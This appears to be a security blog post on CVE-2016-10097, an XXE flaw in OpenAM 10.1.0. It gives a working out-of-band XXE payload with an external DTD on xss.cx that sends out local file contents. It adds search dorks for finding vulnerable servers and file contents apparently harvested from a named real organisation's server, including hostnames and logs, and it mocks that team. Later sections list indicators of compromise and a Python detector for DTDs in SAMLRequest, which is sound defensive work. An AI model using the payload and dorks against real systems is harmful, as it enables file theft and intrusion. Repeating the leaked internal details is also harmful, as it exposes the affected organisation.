CVE-2016-10097 – See Also Indicators of Compromise
DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway”
XML External Entity (XXE) Vulnerability in /SSOPOST/metaAlias/%realm%/idpv2 in OpenAM – Access Management 10.1.0 allows remote attackers to read arbitrary files via the SAMLRequest parameter.
XXE Proof of Concept (PoC) Code for Exploit against Open AM 10.1.0 at the SAML Request Parameter via /SSOPOST/metaAlias/%realm%/idpv2
|The Code for CVE-2016-10097|
CVE-2016-10097, XML Injection, XXE, Open AM 10.1
<!DOCTYPE data SYSTEM "http://xss.cx/openam101.dtd"><data>&send;</data>
Contents of openam101.dtd:
<!ENTITY % file SYSTEM "file:///proc/meminfo">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://xss.cx/?%file;'>">
cpu 419311965 4958 41906219 5571468847 1211462 8047 3780040 0 0
cpu0 103233830 1190 8362638 1396465878 301560 1975 552107 0 0
cpu1 102848677 1225 8610282 1397505613 324501 2071 519396 0 0
cpu2 111458378 1316 16816343 1378419372 283117 2061 2203759 0 0
cpu3 101771078 1225 8116954 1399077982 302283 1939 504776 0 0
softirq 21376324649 0 1786417168 3049727 3740787123 46379118 0 4661 668387188
Open Source Software Exploits can often be identified via a well-crafted DORK: (1) inurl:SSOPOST OR (2) X-DSAME Version: Release 9.5.1 Build 9.5.1(2010-November-04 13:03).
Any SSO Provider running an old, out-of-date OpenAM 10.1.0 has an Exploitable SSO that can be found with a simple DORK Search. Sensitive Information is available via XXE!
|OPEN AM V10.1 DORK: “Copyright © 2010 ForgeRock AS, Philip Pedersens vei 1, 1366 Lysaker, Norway“|
CV InfoSec Team – You had 1 Job
The SAMLRequest parameter is vulnerable to XML external entity injection at /SSOPOST/metaAlias/%realm%/idpv2
First Issue: Contents of /etc/issue – Red Hat Enterprise Linux Server release 6.6 (Santiago)
Comments: Best to look for a new job outside of InfoSec
Second Issue: Listing of /etc/motd – All activity on this system is subject to monitoring. If information collected reveals possible activity that exceeds privileges, evidence of such activity will be used for further action. By continuing past this point, you expressly consent to this monitoring.
Comments: No one is monitoring this VM or e-mail to security@
Third Issue: Contents of /tmp:
Contents of /tmp/LogProcessor.out
06:00:01 [WARN] – Using db.host: ora1tacap.srv.hcvlny.cv.net
06:00:01 [WARN] – Processing log file: /cust/apache/logs/atmail-reporting.log
06:00:01 [WARN] – Copying to temp file: /tmp/atmail-reporting.log.20160316-0600687904557808202862.log
06:00:01 [ERROR] – Could not read the reporting log
java.io.FileNotFoundException: /cust/apache/logs/atmail-reporting.log (No such file or directory)
at java.io.FileInputStream.open(Native Method)
06:00:01 [WARN] – Wrote buffer: 0 in 93 millis
06:00:01 [WARN] – Completed.
Comments: Serving your /tmp Directory in response to an HTTP POST isn't the desired outcome; you're doing it all wrong.
Issue Four: Contents of /etc/shells
Comments: BASH is our favorite shell, but you probably didn't expect your bash_history to be served over HTTP, did you?
Issue Five: You left all the default files available from the Install
|Open AM 10.1 Configuration Wizard|
|OPEN AM Version 10.1.0 Default Admin Page at Installation|
Comments: There is no Scanner that can perform proper XXE to get the Keys to the Kingdom automagically. XML Injection done properly is all manual. You'll need to update SessionIDs, Cookies and other HTTP Headers. Within the SAML, the XML will contain URIs and custom resources that will need to be massaged by hand. Don't push out a huge signature with a Scanner. Even if you get a Bite on XXE in Burp, you'll need to sit down and do the Exploration and Harvesting by Hand with Burp Repeater and the Command Line; look at the pictures of what can be Harvested below.
XXE IoC’s for InfoSec Teams
1. Is your Server Patched and Up To Date?
2. Are you watching Outbound Connections from the XML Parser?
- Port 21, 22, 23, 80, 443, 8080, 8443?
- Are there Established Connections from an XML Host?
- Did you see /etc/passwd in the GET or POST?
3. Have you disabled External Entity Resolution?
- Can an Attacker still reference URIs?
- What about upgrade history Logs?
|XXE Recon can provide clues to RCE Endpoints. Picture shows JBOSS Web Console recently installed.|
- Do you allow the XML Parser to Serve your ~root/.bash_history too?
|XXE Check for contents of ~root/.bash_history|
- Do you know which Directories an Attacker can Read and Exfiltrate via XXE?
- Can an Attacker abuse Protocol Handlers?
- jar:// too?
- How about those Windows Help Files?
- Or find out where else you auth?
|.bash_history can provide additional clue to the Keys to the Kingdom|
4. Have you restricted the Permissions of the XML Parser and its UID:GID sufficiently?
- To Prevent File System Scanning?
- To Prevent LAN Scanning?
- To prevent connecting to localhost?
5. Have you Programmatically disallowed DNS Lookups from your XML Parser?
- By modifying the Source
6. Have you recently performed a Manual Engagement with an XML Parser that includes Fuzzing?
(If you've answered 'NO' to these Questions, it's time to look for another Job)
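As an added example for questions 2 and 3 above (this is not code from the original post), a Python check that decodes the SAMLRequest parameter of POSTs to /SSOPOST/metaAlias/<realm>/idpv2 (base64, or base64 over raw DEFLATE for the Redirect binding) and flags any DOCTYPE, ENTITY or external SYSTEM declaration, none of which a legitimate SAML AuthnRequest needs. The realm "myrealm", the attacker.invalid host and the request records are constructed sample data.

```python
import base64, re, zlib
from urllib.parse import parse_qs, urlencode

# Declarations a SAML AuthnRequest never needs; any one in a SAMLRequest merits an alert.
XXE_MARKERS = {"DOCTYPE": re.compile(r"<!DOCTYPE", re.I),
               "ENTITY": re.compile(r"<!ENTITY", re.I),
               "SYSTEM": re.compile(r"\bSYSTEM\s+[\"']", re.I)}  # external reference
def decode_saml_request(value: str) -> str:
    """base64 (HTTP-POST binding) or base64 over raw DEFLATE (HTTP-Redirect) back to XML; '' on failure."""
    try:
        data = base64.b64decode(value)
    except ValueError:  # binascii.Error is a ValueError
        return ""
    if not data.startswith(b"<"):  # not plain XML: try raw DEFLATE (-15 = no zlib header)
        try:
            data = zlib.decompress(data, -15)
        except zlib.error:
            return ""
    return data.decode("utf-8", errors="replace")
def find_xxe_markers(xml_text: str) -> list:
    return [name for name, rx in XXE_MARKERS.items() if rx.search(xml_text)]

def flag_requests(records) -> list:
    """(path, form_body) pairs -> (path, markers) for each SAMLRequest to the IdP endpoint carrying a DTD."""
    hits = []
    for path, body in records:
        if "/SSOPOST/metaAlias/" not in path:
            continue  # only the IdP POST endpoint named in the advisory
        for value in parse_qs(body).get("SAMLRequest", []):
            markers = find_xxe_markers(decode_saml_request(value))
            if markers:
                hits.append((path, markers))
    return hits

def encode_saml_request(xml: str, deflate: bool = False) -> str:
    """Encode XML the way an SP would; used only to build the samples below."""
    raw = xml.encode()
    if deflate:  # HTTP-Redirect binding deflates before base64
        co = zlib.compressobj(wbits=-15)
        raw = co.compress(raw) + co.flush()
    return base64.b64encode(raw).decode()
# Constructed sample traffic: hypothetical realm "myrealm" and attacker.invalid host.
IDP = "/SSOPOST/metaAlias/myrealm/idpv2"
BENIGN = '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1"/>'
EXTERNAL_DTD = '<!DOCTYPE data SYSTEM "http://attacker.invalid/x.dtd"><data>&send;</data>'
INLINE_ENTITY = '<!DOCTYPE data [<!ENTITY x "y">]><data>&x;</data>'
SAMPLE_REQUESTS = [(IDP, urlencode({"SAMLRequest": encode_saml_request(BENIGN)})),
                   (IDP, urlencode({"SAMLRequest": encode_saml_request(EXTERNAL_DTD)})),
                   (IDP, urlencode({"SAMLRequest": encode_saml_request(INLINE_ENTITY, True)}))]
```

Run flag_requests over your own access-log or WAF records in the same (path, body) shape; the benign request produces no hit, the other two are flagged with the declarations found.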
That’s all for today folks!
MS16-035 made Breaking Changes:
External references disabled by default
XPath Transform disabled by default
XSLT Transform disabled by default